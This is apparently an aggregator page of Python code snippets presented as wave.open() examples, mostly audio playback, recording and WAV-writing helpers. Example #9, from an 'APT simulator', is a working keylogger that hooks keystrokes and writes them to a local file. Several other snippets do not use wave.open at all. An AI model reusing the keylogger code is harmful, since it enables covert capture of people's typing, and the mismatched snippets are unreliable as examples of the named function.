Python wave.open() Examples
The following are 30
code examples of wave.open().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
wave
, or try the search function
.

Example #1
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 13 votes |
def __enter__(self): self._audio_interface = pyaudio.PyAudio() self._audio_stream = self._audio_interface.open( format=pyaudio.paInt16, channels=1, rate=self._rate, input=True, frames_per_buffer=self._chunk, # Run the audio stream asynchronously to fill the buffer object. # This is necessary so that the input device's buffer doesn't # overflow while the calling thread makes network requests, etc. stream_callback=self._fill_buffer, ) self.closed = False return self #def __exit__(self, type, value, traceback):
Example #2
Source File: snowboydecoder.py From google-assistant-hotword-raspi with MIT License | 11 votes |
def play_audio_file(fname=DETECT_DING): """Simple callback function to play a wave file. By default it plays a Ding sound. :param str fname: wave file name :return: None """ ding_wav = wave.open(fname, 'rb') ding_data = ding_wav.readframes(ding_wav.getnframes()) audio = pyaudio.PyAudio() stream_out = audio.open( format=audio.get_format_from_width(ding_wav.getsampwidth()), channels=ding_wav.getnchannels(), rate=ding_wav.getframerate(), input=False, output=True) stream_out.start_stream() stream_out.write(ding_data) time.sleep(0.2) stream_out.stop_stream() stream_out.close() audio.terminate()
Example #3
Source File: _audio.py From ai-makers-kit with MIT License | 8 votes |
def play_wav(fname, chunk=CHUNK): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while len(data) > 0: # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) # cleanup stuff stream.close() p.terminate()
Example #4
Source File: raw_data_loaders.py From ibllib with MIT License | 7 votes |
def load_mic(session_path): """ Load Microphone wav file to np.array of len nSamples :param session_path: Absoulte path of session folder :type session_path: str :return: An array of values of the sound waveform :rtype: numpy.array """ if session_path is None: return path = Path(session_path).joinpath("raw_behavior_data") path = next(path.glob("_iblrig_micData.raw*.wav"), None) if not path: return None fp = wave.open(path) nchan = fp.getnchannels() N = fp.getnframes() dstr = fp.readframes(N * nchan) data = np.frombuffer(dstr, np.int16) data = np.reshape(data, (-1, nchan)) return data
Example #5
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 7 votes |
def play_file(fname): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() chunk = 1024 # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while len(data) > 0: # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) # cleanup stuff. stream.close() p.terminate()
Example #6
Source File: _audio.py From ai-makers-kit with MIT License | 7 votes |
def play_wav(fname, chunk=CHUNK): # create an audio object wf = wave.open(fname, 'rb') p = pyaudio.PyAudio() # open stream based on the wave object which has been input. stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) # read data (based on the chunk size) data = wf.readframes(chunk) # play stream (looping from beginning of file to the end) while len(data) > 0: # writing to the stream is what *actually* plays the sound. stream.write(data) data = wf.readframes(chunk) # cleanup stuff stream.close() p.terminate()
Example #7
Source File: cutoff.py From GST-Tacotron with MIT License | 6 votes |
def cutoff(input_wav, output_wav): ''' input_wav --- input wav file path output_wav --- output wav file path ''' # read input wave file and get parameters. with wave.open(input_wav, 'r') as fw: params = fw.getparams() # print(params) nchannels, sampwidth, framerate, nframes = params[:4] strData = fw.readframes(nframes) waveData = np.fromstring(strData, dtype=np.int16) max_v = np.max(abs(waveData)) for i in range(waveData.shape[0]): if abs(waveData[i]) > 0.08 * max_v: break for j in range(waveData.shape[0] - 1, 0, -1): if abs(waveData[j]) > 0.08 * max_v: break # write new wav file with wave.open(output_wav, 'w') as fw: params = list(params) params[3] = nframes - i - (waveData.shape[0] - 1 - j) fw.setparams(params) fw.writeframes(strData[2 * i:2 * (j + 1)])
Example #8
Source File: raw_data_loaders.py From ibllib with MIT License | 6 votes |
def load_settings(session_path): """ Load PyBpod Settings files (.json). [description] :param session_path: Absolute path of session folder :type session_path: str :return: Settings dictionary :rtype: dict """ if session_path is None: return path = Path(session_path).joinpath("raw_behavior_data") path = next(path.glob("_iblrig_taskSettings.raw*.json"), None) if not path: return None with open(path, 'r') as f: settings = json.load(f) if 'IBLRIG_VERSION_TAG' not in settings.keys(): settings['IBLRIG_VERSION_TAG'] = '' return settings
Example #9
Source File: apt_simulator.py From hack4career with Apache License 2.0 | 6 votes |
def keylogger(): if console: print "* Logging key events... (press enter to escape)" def OnKeyboardEvent (event): keys = "" full_path = os.path.realpath(__file__) path, file = os.path.split(full_path) path = path + "\keylogs.txt" keyfile = open(path, "a") key = chr(event.Ascii) if event.Ascii == 13: key = "\n" hook.UnhookKeyboard() if console: print "* done\n" main() keys = keys + key keyfile.write(keys) keyfile.close() hook = pyHook.HookManager() hook.KeyDown = OnKeyboardEvent hook.HookKeyboard() pythoncom.PumpMessages()
Example #10
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #11
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #12
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #13
Source File: proj2_yt_mvp.py From ai-makers-kit with MIT License | 6 votes |
def __enter__(self): self._audio_interface = pyaudio.PyAudio() self._audio_stream = self._audio_interface.open( format=pyaudio.paInt16, channels=1, rate=self._rate, input=True, frames_per_buffer=self._chunk, # Run the audio stream asynchronously to fill the buffer object. # This is necessary so that the input device's buffer doesn't # overflow while the calling thread makes network requests, etc. stream_callback=self._fill_buffer, ) self.closed = False return self #def __exit__(self, type, value, traceback):
Example #14
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #15
Source File: ex4_getText2VoiceStream.py From ai-makers-kit with MIT License | 6 votes |
def getText2VoiceStream(inText,inFileName): channel = grpc.secure_channel('{}:{}'.format(HOST, PORT), getCredentials()) stub = gigagenieRPC_pb2_grpc.GigagenieStub(channel) message = gigagenieRPC_pb2.reqText() message.lang=0 message.mode=0 message.text=inText writeFile=open(inFileName,'wb') for response in stub.getText2VoiceStream(message): if response.HasField("resOptions"): print ("ResVoiceResult: %d" %(response.resOptions.resultCd)) if response.HasField("audioContent"): print ("Audio Stream") writeFile.write(response.audioContent) writeFile.close()
Example #16
Source File: main.py From HanTTS with MIT License | 6 votes |
def _play_audio(path, delay): try: time.sleep(delay) wf = wave.open(path, 'rb') p = pyaudio.PyAudio() stream = p.open(format=p.get_format_from_width(wf.getsampwidth()), channels=wf.getnchannels(), rate=wf.getframerate(), output=True) data = wf.readframes(TextToSpeech.CHUNK) while data: stream.write(data) data = wf.readframes(TextToSpeech.CHUNK) stream.stop_stream() stream.close() p.terminate() return except: pass
Example #17
Source File: models.py From cloud-asr with Apache License 2.0 | 6 votes |
def save_wav(self, chunk_id, model, body, frame_rate): checksum = md5.new(body).hexdigest() directory = "%s/%s" % (model, checksum[:2]) self.create_directories_if_needed(self.path + "/" + directory) path = '%s/%s/%s.wav' % (self.path, directory, checksum) url = '/static/data/%s/%s.wav' % (directory, checksum) wav = wave.open(path, 'w') wav.setnchannels(1) wav.setsampwidth(2) wav.setframerate(frame_rate) wav.writeframes(body) wav.close() return (path, url)
Example #18
Source File: audio.py From fine-lm with MIT License | 5 votes |
def _get_timit(directory): """Extract TIMIT datasets to directory unless directory/timit exists.""" if os.path.exists(os.path.join(directory, "timit")): return assert FLAGS.timit_paths for path in FLAGS.timit_paths.split(","): with tf.gfile.GFile(path) as f: with tarfile.open(fileobj=f, mode="r:gz") as timit_compressed: timit_compressed.extractall(directory)
Example #19
Source File: audio.py From fine-lm with MIT License | 5 votes |
def _get_audio_data(filepath): # Construct a true .wav file. out_filepath = filepath.strip(".WAV") + ".wav" # Assumes sox is installed on system. Sox converts from NIST SPHERE to WAV. call(["sox", filepath, out_filepath]) wav_file = wave.open(open(out_filepath)) frame_count = wav_file.getnframes() byte_array = wav_file.readframes(frame_count) data = [int(b.encode("hex"), base=16) for b in byte_array] return data, frame_count, wav_file.getsampwidth(), wav_file.getnchannels()
Example #20
Source File: sound_board_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes |
def get_cur_audio_length(): wav_file = wave.open(f"{dir_utils.get_perm_med_dir()}/sound_board/{settings.current_track}.wav", 'r') frames = wav_file.getnframes() rate = wav_file.getframerate() duration = frames / float(rate) wav_file.close() return duration
Example #21
Source File: sound_board_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes |
def get_audio_length(file_name): try: wav_file = wave.open(f"{dir_utils.get_perm_med_dir()}/sound_board/{file_name}.wav", 'r') frames = wav_file.getnframes() rate = wav_file.getframerate() duration = frames / float(rate) wav_file.close() if not duration: return -1 except Exception: return -1 return duration
Example #22
Source File: text_to_speech_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes |
def get_cur_audio_length(): wav_file = wave.open(f"{dir_utils.get_perm_med_dir()}/text_to_speech/{settings.current_track}.oga", 'r') frames = wav_file.getnframes() rate = wav_file.getframerate() duration = frames / float(rate) wav_file.close() return duration
Example #23
Source File: text_to_speech_utility.py From JJMumbleBot with GNU General Public License v3.0 | 5 votes |
def download_clip(clip_name, voice, msg, directory=None): temp = {'text': msg, 'voice': voice} json_dump = json.dumps(temp) if directory is None: directory = f'{dir_utils.get_perm_med_dir()}' try: url = 'https://streamlabs.com/polly/speak' headers = {'Accept': 'application/json', 'Content-Type': 'application/json'} r = requests.post(url, data=json_dump, headers=headers) # print(r.status_code) if r.status_code == 200: resp = requests.get(json.loads(r.text)['speak_url']) # print(resp.status_code) if resp.status_code == 200: with open(f'{directory}/text_to_speech/{clip_name}.oga', 'wb') as f: f.write(resp.content) uri = f'{directory}/text_to_speech/{clip_name}.oga' sp.call( [settings.tts_metadata[C_PLUGIN_SETTINGS][P_VLC_DIR], uri] + ['-I', 'dummy', '--quiet', '--one-instance', '--no-repeat', '--sout', '#transcode{acodec=wav, channels=2, samplerate=43000, ' 'ab=192, threads=8}:std{access=file, mux=wav, ' f'dst={directory}/text_to_speech/{clip_name}.wav ' '}', 'vlc://quit']) return True dprint(f'Could not download clip: Response-{r.status_code}') return False dprint(f'Could not download clip: Response-{r.status_code}') return False except Exception as e: dprint(e) return False
Example #24
Source File: audio_scripts.py From ProMo with MIT License | 5 votes |
def getSoundFileDuration(fn): ''' Returns the duration of a wav file (in seconds) ''' audiofile = wave.open(fn, "r") params = audiofile.getparams() framerate = params[2] nframes = params[3] duration = float(nframes) / framerate return duration
Example #25
Source File: wavio.py From Jamais-Vu with MIT License | 5 votes |
def readwav(file): """ Read a WAV file. Parameters ---------- file : string or file object Either the name of a file or an open file pointer. Return Values ------------- rate : float The sampling frequency (i.e. frame rate) sampwidth : float The sample width, in bytes. E.g. for a 24 bit WAV file, sampwidth is 3. data : numpy array The array containing the data. The shape of the array is (num_samples, num_channels). num_channels is the number of audio channels (1 for mono, 2 for stereo). Notes ----- This function uses the `wave` module of the Python standard libary to read the WAV file, so it has the same limitations as that library. In particular, the function does not read compressed WAV files. """ wav = _wave.open(file) rate = wav.getframerate() nchannels = wav.getnchannels() sampwidth = wav.getsampwidth() nframes = wav.getnframes() data = wav.readframes(nframes) wav.close() array = _wav2array(nchannels, sampwidth, data) return rate, sampwidth, array
Example #26
Source File: abook-transcribe.py From zamia-speech with GNU Lesser General Public License v3.0 | 5 votes |
def play_wav(start=0.0, stop=1.0): global tts, segmentfn wavef = wave.open(segmentfn, 'rb') num_channels = wavef.getnchannels() num_frames = wavef.getnframes() frame_rate = wavef.getframerate() sampwidth = wavef.getsampwidth() duration = float(num_frames) / float(frame_rate) buf = StringIO() wavout = wave.open(buf, 'w') wavout.setframerate(frame_rate) wavout.setnchannels(num_channels) wavout.setsampwidth(sampwidth) wavef.setpos(int(start * num_frames)) samples = wavef.readframes(int((stop-start) * num_frames)) wavout.writeframes(samples) wavef.close() wavout.close() # with open(segmentfn) as wavf: # wav = wavf.read() tts.play_wav(buf.getvalue(), async=True)
Example #27
Source File: vad.py From reconstructing_faces_from_voices with GNU General Public License v3.0 | 5 votes |
def read_wave(path): with contextlib.closing(wave.open(path, 'rb')) as wf: num_channels = wf.getnchannels() assert num_channels == 1 sample_width = wf.getsampwidth() assert sample_width == 2 sample_rate = wf.getframerate() assert sample_rate in (8000, 16000, 32000) pcm_data = wf.readframes(wf.getnframes()) return pcm_data, sample_rate
Example #28
Source File: vad.py From reconstructing_faces_from_voices with GNU General Public License v3.0 | 5 votes |
def write_wave(path, audio, sample_rate): with contextlib.closing(wave.open(path, 'wb')) as wf: wf.setnchannels(1) wf.setsampwidth(2) wf.setframerate(sample_rate) wf.writeframes(audio)
Example #29
Source File: raw_data_loaders.py From ibllib with MIT License | 5 votes |
def load_ambient_sensor(session_path): """ Load Ambient Sensor data from session. Probably could be extracted to DatasetTypes: _ibl_trials.temperature_C, _ibl_trials.airPressure_mb, _ibl_trials.relativeHumidity Returns a list of dicts one dict per trial. dict keys are: dict_keys(['Temperature_C', 'AirPressure_mb', 'RelativeHumidity']) :param session_path: Absoulte path of session folder :type session_path: str :return: list of dicts :rtype: list """ if session_path is None: return path = Path(session_path).joinpath("raw_behavior_data") path = next(path.glob("_iblrig_ambientSensorData.raw*.jsonable"), None) if not path: return None data = [] with open(path, 'r') as f: for line in f: data.append(json.loads(line)) return data
Example #30
Source File: amazonpolly.py From tts-ros1 with Apache License 2.0 | 5 votes |
def _pcm2wav(self, audio_data, wav_filename, sample_rate): """per Amazon Polly official doc, the pcm in a signed 16-bit, 1 channel (mono), little-endian format.""" wavf = wave.open(wav_filename, 'w') wavf.setframerate(int(sample_rate)) wavf.setnchannels(1) # 1 channel wavf.setsampwidth(2) # 2 bytes == 16 bits wavf.writeframes(audio_data) wavf.close()